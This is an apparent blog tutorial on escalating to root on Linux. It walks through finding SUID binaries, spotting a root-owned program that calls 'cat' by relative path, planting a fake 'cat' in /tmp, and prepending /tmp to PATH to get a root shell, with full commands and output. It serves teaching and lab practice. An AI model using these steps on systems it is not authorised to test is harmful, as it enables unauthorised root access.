$PATH Variable
PATH is an eviroment variable in Linux that tells the shell which directories to search for excutable files. Whenever a user types in a command at the command line that is not built into the shell or that does not include its absolute path, the shell searches through those directories, which constitute the user's search path ($PATH), until it finds an executable file with that name.
You can view the current users search path by issuing the command: echo $PATH
sam@debian:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sam@debian:~$
As you see when you execute a command on the command line, the shell will search through the directories in you $PATH variable for the command to be ran. For example, if we type the 'cat' command, then the shell will search through '/usr/local/sbin', '/usr/local/bin', etc until it finds the 'cat' executable and runs it.
SUID Programs
SUID programs execute in the context of the owner of the file. We would perfer the user be root so everything that is executed in the program is executed as root also.
Next we search for any SUID able files on the system that we may exploit.
sam@debian:~$ find / -perm -u=s -type f 2>/dev/null /home/sam/myprog /usr/sbin/pppd /usr/bin/gpasswd /usr/bin/sudo /usr/bin/bwrap /usr/bin/newgrp /usr/bin/passwd /usr/bin/su /usr/bin/chfn /usr/bin/ntfs-3g /usr/bin/mount /usr/bin/fusermount /usr/bin/pkexec /usr/bin/chsh /usr/bin/umount /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/xorg/Xorg.wrap sam@debian:~$
After searching we find a program '/home/sam/myprog' that is listed. We next move on to viewing the file permissions of the file.
sam@debian:~$ ls -l total 68 drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Desktop drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Documents drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Downloads drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Music -rwsr-xr-x 1 root root 16712 Jan 11 23:24 myprog drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Pictures drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Public drwxr-xr-x 3 sam sam 4096 Jan 11 23:41 public_html drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Templates drwxr-xr-x 2 sam sam 4096 Nov 10 11:14 Videos sam@debian:~$
We see that the '-rwsr-xr-x' SUID bit is set and the owner is 'root'. Lets analyze the file with the 'strings' program and see if we find anything intresting.
sam@debian:~$ strings myprog | less /lib64/ld-linux-x86-64.so.2 $=v/ libc.so.6 setuid system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ cat /home/sam/backup/a.tmp ;*3$" GCC: (Debian 8.3.0-6) 8.3.0 :q sam@debian:~$
Upon analyzing the results from 'strings' we find it running the command 'cat /home/sam/backup/a.tmp'. What we want to do is create our own cat binary and export our PATH to a directory where our malicous binary is stored.
We first create our binary in the '/tmp' directory of the system.
sam@debian:~$ cd /tmp sam@debian:/tmp$ echo "/bin/bash" > cat sam@debian:/tmp$ chmod 777 cat sam@debian:/tmp$
Once we have done that we echo our PATH variable to show us what search paths the shell uses when executing commands.
sam@debian:/tmp$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin sam@debian:/tmp$
Now we want to export our PATH so that it points to '/tmp' and searches that directory first when a command is executed.
sam@debian:/tmp$ export PATH=/tmp:$PATH sam@debian:/tmp$ echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
We echo the PATH again and see that '/tmp' is at the first of the line of directories to search through. What this means is when we execute the program 'cat', the shell will search '/tmp' before all other directories and will execute our malicous 'cat' binary and give us a root shell.
sam@debian:/tmp$ cd /home/sam sam@debian:~$ ./myprog root@debian:~# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(scanner),117(lpadmin),1000(sam) root@debian:~# whoami root root@debian:~#
Once we execute the 'myprog' program we get dumped into a root shell.
No comments:
Post a Comment